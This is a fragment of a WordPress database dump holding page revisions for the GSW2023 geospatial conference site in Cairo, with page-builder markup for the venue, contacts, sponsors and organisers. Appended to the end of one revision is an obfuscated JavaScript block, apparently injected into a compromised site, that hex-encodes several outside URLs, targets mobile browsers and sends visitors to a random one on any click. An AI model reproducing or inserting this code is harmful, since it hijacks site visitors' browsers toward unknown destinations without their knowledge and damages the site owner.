letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 14:27:08','2023-06-09 14:27:08','',3066,'https://gsw2023.com/?p=4652',0,'revision','',0),
(4653,1,'2023-06-09 14:30:14','2023-06-09 14:30:14','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: 